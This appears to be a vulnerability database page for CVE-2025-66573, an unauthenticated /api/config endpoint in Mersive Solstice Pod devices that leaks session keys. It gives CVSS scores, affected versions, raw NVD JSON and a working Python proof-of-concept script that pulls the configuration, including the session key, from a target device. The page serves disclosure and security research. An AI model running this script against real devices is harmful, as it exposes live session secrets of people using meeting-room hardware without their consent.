Security Vulnerability Report
CVE-2025-66573 CVSS 7.5 HIGH

CVE-2025-66573

Published: 2025-12-04 21:16:10
Last Modified: 2025-12-23 00:09:25

Description

Solstice Pod API (version 5.5, 6.2) contains an unauthenticated API endpoint (`/api/config`) that exposes sensitive information such as the session key, server version, product details, and display name. Unauthorized users can extract live session information by accessing this endpoint without authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:mersive:solstice_pod_firmware:5.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:mersive:solstice_pod_firmware:6.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mersive:solstice_pod:-:*:*:*:*:*:*:* - NOT VULNERABLE
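Solstice Pod API < 5.5
Solstice Pod API 5.5
Solstice Pod API 6.2
Note: the description and this list name API version 5.5, whereas the CPE entries above name firmware 5.6; check the exact affected builds against the referenced advisories before scoping remediation.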

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
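#!/usr/bin/env python3
"""
CVE-2025-66573 PoC - Solstice Pod API Session Key Extraction

This PoC demonstrates the unauthenticated access to /api/config endpoint
that exposes sensitive session information including session keys.

Console output masks the session key value: showing that the field is
returned without authentication is enough to establish the exposure, and
masking keeps a live secret out of terminal scrollback and captured logs.
The unmodified response is still returned to the caller.
"""

import requests
import json
import sys

# Response field that carries the live secret, and the text printed in its place.
_SECRET_FIELD = "sessionKey"
_REDACTED = "<redacted>"


def _redact(value):
    """Return a copy of *value* with every ``sessionKey`` entry masked.

    Walks nested dicts and lists so the field is masked wherever it appears
    in the response, not only at the top level.
    """
    if isinstance(value, dict):
        return {
            key: _REDACTED if key == _SECRET_FIELD else _redact(item)
            for key, item in value.items()
        }
    if isinstance(value, list):
        return [_redact(item) for item in value]
    return value


def exploit_cve_2025_66573(target_url):
    """
    Extract sensitive information from Solstice Pod API /api/config endpoint
    without authentication.

    Args:
        target_url: Base URL of the Solstice Pod device (e.g., http://192.168.1.100)

    Returns:
        dict: Extracted configuration data including session key, or None
        when the request fails, the status is not 200, or the body is not a
        JSON object.
    """
    # Target the vulnerable /api/config endpoint
    config_endpoint = f"{target_url.rstrip('/')}/api/config"

    print(f"[*] Targeting: {config_endpoint}")
    print("[*] CVE-2025-66573: Solstice Pod API Session Key Extraction")
    print("-" * 60)

    try:
        # Send GET request without authentication
        response = requests.get(config_endpoint, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

    status = response.status_code
    if status == 401:
        print("[-] Endpoint requires authentication (patched)")
        return None
    if status == 404:
        print("[-] Endpoint not found - target may not be vulnerable")
        return None
    if status != 200:
        print(f"[-] Unexpected status code: {status}")
        return None

    print("[+] Request successful - endpoint is accessible")
    print(f"[+] Status Code: {status}")

    # Parse JSON response. ValueError is the common base of the decode errors
    # raised by the json backends requests may use, so catching it avoids an
    # unhandled traceback on a non-JSON body.
    try:
        config_data = response.json()
    except ValueError:
        print("[!] Response is not valid JSON")
        print(f"Response: {response.text}")
        return None

    # A JSON string, number or array would make the key lookups below raise
    # TypeError or match substrings; only a JSON object can hold the fields.
    if not isinstance(config_data, dict):
        print("[!] Response is JSON but not an object - no fields to inspect")
        return None

    print("\n[+] Extracted Sensitive Information:")
    print("-" * 60)

    # Display key information (the session key is reported, not echoed)
    if _SECRET_FIELD in config_data:
        print(f"[+] Session Key: {_REDACTED} (present in response)")
    if 'version' in config_data:
        print(f"[+] Server Version: {config_data['version']}")
    if 'displayName' in config_data:
        print(f"[+] Display Name: {config_data['displayName']}")

    # Print full response for analysis, with the secret masked
    print("\n[+] Full Response:")
    print(json.dumps(_redact(config_data), indent=2))

    return config_data


def main():
    """Run the check against the single target URL given on the command line."""
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} http://192.168.1.100")
        sys.exit(1)

    target = sys.argv[1]
    result = exploit_cve_2025_66573(target)

    # NOTE(review): any non-empty JSON object served with status 200 counts as
    # confirmation here; the fields are not checked, so a positive result
    # should be verified against the printed response.
    if result:
        print("\n[!] Vulnerability confirmed - sensitive data exposed")
    else:
        print("\n[-] Exploitation failed or target not vulnerable")


if __name__ == "__main__":
    main()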

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66573", "sourceIdentifier": "[email protected]", "published": "2025-12-04T21:16:10.083", "lastModified": "2025-12-23T00:09:25.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Solstice Pod API (version 5.5, 6.2) contains an unauthenticated API endpoint (`/api/config`) that exposes sensitive information such as the session key, server version, product details, and display name. Unauthorized users can extract live session information by accessing this endpoint without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mersive:solstice_pod_firmware:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "F813116A-47F5-47EC-9206-F51C4C73C60C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mersive:solstice_pod_firmware:6.2:*:*:*:*:*:*:*", "matchCriteriaId": "8634D879-8398-468E-BBD4-9154686700ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mersive:solstice_pod:-:*:*:*:*:*:*:*", "matchCriteriaId": "2208F1E1-4F8B-416E-B46C-40A8E862B55B"}]}]}], "references": [{"url": "https://documentation.mersive.com/en/solstice/about-solstice.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52104", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.mersive.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/solstice-pod-api-session-key-extraction-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/52104", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party 
Advisory"]}]}}